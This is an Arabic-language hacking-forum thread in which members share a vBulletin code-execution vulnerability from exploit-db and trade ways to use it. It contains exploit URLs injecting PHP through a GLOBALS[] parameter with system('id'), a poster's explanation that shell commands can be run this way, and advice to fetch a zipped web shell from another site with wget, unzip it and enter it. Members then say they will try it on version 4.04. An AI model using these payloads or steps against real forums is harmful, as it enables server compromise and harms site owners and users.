الحققققق ثغرة جديده بمنتديات vb

[حربي هكر]

السلام عليكم .. اعضاء العناكب .. من خلال تصحفي بموقع الاكسبلويت

حصل ثغرة .. شكلي اول مافتحت على الموقع توه منزله ثغرة مصابه فيها منتديات vb

لاتفوووتكم . ألثغرة الحقوووووا .. عليها هذا رابط الثغرررررة

http://www.exploit-db.com/exploits/14686/

المصدر: :: vBspiders Professional Network ::

---

hgprrrrr eyvm []d]i flkj]dhj vb

[GuEvArA511]

مشكور ثغرة من جد طازة

بس نبي شرح كيف تستغلالها لاهنت

اذا تعرف ولا اي واحد من الشباب يشرحها لنا

هذي هي استغلالاتها لكن مافهمت شي

كود PHP:

http://DNSname.com/patch/clientscript/vbulletin-core.js?v=
 
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=
 
http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart 


[dz-fox]

اقتباس المشاركة الأصلية كتبت بواسطة GuEvArA511 مشكور ثغرة من جد طازة بس نبي شرح كيف تستغلالها لاهنت اذا تعرف ولا اي واحد من الشباب يشرحها لنا هذي هي استغلالاتها لكن مافهمت شي كود PHP: http://DNSname.com/patch/clientscript/vbulletin-core.js?v=   http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)   http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=   http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."   http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart

عزيزي هذه تغرة Code Execution يعني تقدر تطبق أوامر التي تستعملها في الشل في رابط الموقع مباشرة

يعني مثلا http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

بهذا سيظهر لك في الموقع صلاحياتك على السيرفر لأننا ادرجنا الأمر id

افضل الطرق انك تسحب شل من موقع آخر برابط مباشر بصيغة zip (مضغوط) بالأمر wget

و تفك الضغط الضغط بالأمر unzip و تدخل على الشل و smilies12

[ارساوي]

يعطيك العافية

[المخترق الصغير]

مشكور اخي الثغرة في الاصدار 4.04 نجرب و نعود ان كانت فعالة ام لا...شكرا لك